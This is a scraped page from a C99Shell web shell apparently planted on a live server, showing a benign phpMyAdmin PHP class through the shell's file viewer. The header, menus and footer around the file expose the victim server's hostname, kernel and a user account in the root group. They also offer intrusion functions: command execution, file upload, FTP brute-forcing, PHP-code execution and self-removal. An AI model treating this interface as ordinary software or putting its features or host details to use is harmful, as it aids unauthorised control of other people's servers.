!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/libraries/classes/Properties/Options/   drwxr-xr-x
Free 28.69 GB of 117.98 GB (24.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OptionsPropertyItem.php (2.14 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * The top-level class of the "Options" subtree of the object-oriented
 * properties system (the other subtree is "Plugin").
 */

declare(strict_types=1);

namespace 
PhpMyAdmin\Properties\Options;

use 
PhpMyAdmin\Properties\PropertyItem;

/**
 * Superclass for
 *  - PhpMyAdmin\Properties\Options\OptionsPropertyOneItem and
 *  - OptionsProperty Group
 */
abstract class OptionsPropertyItem extends PropertyItem
{
    
/**
     * Name
     *
     * @var string|null
     */
    
private $name;
    
/**
     * Text
     *
     * @var string|null
     */
    
private $text;
    
/**
     * What to force
     *
     * @var string|null
     */
    
private $force;

    
/**
     * @param string $name Item name
     * @param string $text Item text
     */
    
public function __construct($name null$text null)
    {
        if (
$name) {
            
$this->name $name;
        }

        if (! 
$text) {
            return;
        }

        
$this->text $text;
    }

    
/* ~~~~~~~~~~~~~~~~~~~~ Getters and Setters ~~~~~~~~~~~~~~~~~~~~ */

    /**
     * Gets the name
     *
     * @return string|null
     */
    
public function getName()
    {
        return 
$this->name;
    }

    
/**
     * Sets the name
     *
     * @param string $name name
     */
    
public function setName($name): void
    
{
        
$this->name $name;
    }

    
/**
     * Gets the text
     *
     * @return string|null
     */
    
public function getText()
    {
        return 
$this->text;
    }

    
/**
     * Sets the text
     *
     * @param string $text text
     */
    
public function setText($text): void
    
{
        
$this->text $text;
    }

    
/**
     * Gets the force parameter
     *
     * @return string|null
     */
    
public function getForce()
    {
        return 
$this->force;
    }

    
/**
     * Sets the force parameter
     *
     * @param string $force force parameter
     */
    
public function setForce($force): void
    
{
        
$this->force $force;
    }

    
/**
     * Returns the property type ( either "options", or "plugin" ).
     *
     * @return string
     */
    
public function getPropertyType()
    {
        return 
'options';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--